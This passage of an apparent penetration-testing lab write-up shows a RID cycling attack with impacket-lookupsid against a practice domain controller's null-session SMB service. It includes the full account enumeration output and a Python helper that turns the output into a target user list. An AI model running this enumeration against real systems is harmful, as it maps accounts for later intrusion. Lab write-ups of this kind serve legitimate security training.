RID Cycling


The target SMB server allows null sessions, which means a RID cycling attack can be used to brute-force user RIDs.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-lookupsid VAULT.OFFSEC/blahblah@dc.vault.offsec 1000000
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at dc.vault.offsec
[*] StringBinding ncacn_np:dc.vault.offsec[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VAULT\Administrator (SidTypeUser)
501: VAULT\Guest (SidTypeUser)
502: VAULT\krbtgt (SidTypeUser)
512: VAULT\Domain Admins (SidTypeGroup)
513: VAULT\Domain Users (SidTypeGroup)
514: VAULT\Domain Guests (SidTypeGroup)
515: VAULT\Domain Computers (SidTypeGroup)
516: VAULT\Domain Controllers (SidTypeGroup)
517: VAULT\Cert Publishers (SidTypeAlias)
518: VAULT\Schema Admins (SidTypeGroup)
519: VAULT\Enterprise Admins (SidTypeGroup)
520: VAULT\Group Policy Creator Owners (SidTypeGroup)
521: VAULT\Read-only Domain Controllers (SidTypeGroup)
522: VAULT\Cloneable Domain Controllers (SidTypeGroup)
525: VAULT\Protected Users (SidTypeGroup)
526: VAULT\Key Admins (SidTypeGroup)
527: VAULT\Enterprise Key Admins (SidTypeGroup)
553: VAULT\RAS and IAS Servers (SidTypeAlias)
571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias)
572: VAULT\Denied RODC Password Replication Group (SidTypeAlias)
1000: VAULT\DC$ (SidTypeUser)
1101: VAULT\DnsAdmins (SidTypeAlias)
1102: VAULT\DnsUpdateProxy (SidTypeGroup)
1103: VAULT\anirudh (SidTypeUser)

Performing the RID cycling attack with an arbitrary credential (blahblah) against the target SMB service shows that, besides the default domain accounts, anirudh is the only user. The usernames have been saved to the users.txt file.
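The following is an added example, not part of the original writeup or of Impacket: it parses lookupsid output of the format shown above (the sample text is constructed from the lines above, trimmed), rebuilds the full SID that each cycled RID corresponds to, and filters out built-in and machine accounts to produce the users.txt candidate list.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample: a trimmed copy of the impacket-lookupsid output shown above.
SAMPLE_OUTPUT = """\
[*] Brute forcing SIDs at dc.vault.offsec
[*] StringBinding ncacn_np:dc.vault.offsec[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
500: VAULT\\Administrator (SidTypeUser)
501: VAULT\\Guest (SidTypeUser)
502: VAULT\\krbtgt (SidTypeUser)
513: VAULT\\Domain Users (SidTypeGroup)
1000: VAULT\\DC$ (SidTypeUser)
1101: VAULT\\DnsAdmins (SidTypeAlias)
1103: VAULT\\anirudh (SidTypeUser)
"""

class Principal(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str

# "<rid>: <DOMAIN>\<name> (<SidType...>)"; names may contain spaces or '$'
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")

def parse_lookupsid(output: str) -> tuple[Optional[str], list[Principal]]:
    """Return the domain SID and every resolved principal from lookupsid output."""
    domain_sid = None
    principals: list[Principal] = []
    for line in output.splitlines():
        m = DOMAIN_SID_RE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line.strip())
        if m:
            rid, domain, name, sid_type = m.groups()
            principals.append(Principal(int(rid), domain, name, sid_type))
    return domain_sid, principals

def full_sid(domain_sid: str, rid: int) -> str:
    """RID cycling asks LSARPC to resolve '<domain SID>-<rid>' for each candidate RID."""
    return f"{domain_sid}-{rid}"

def non_default_users(principals: list[Principal]) -> list[str]:
    """Keep user accounts only; RIDs below 1000 are built-in, names ending in '$' are machines."""
    return [p.name for p in principals
            if p.sid_type == "SidTypeUser" and p.rid >= 1000 and not p.name.endswith("$")]

if __name__ == "__main__":
    sid, found = parse_lookupsid(SAMPLE_OUTPUT)
    print("\n".join(non_default_users(found)))  # the users.txt content
```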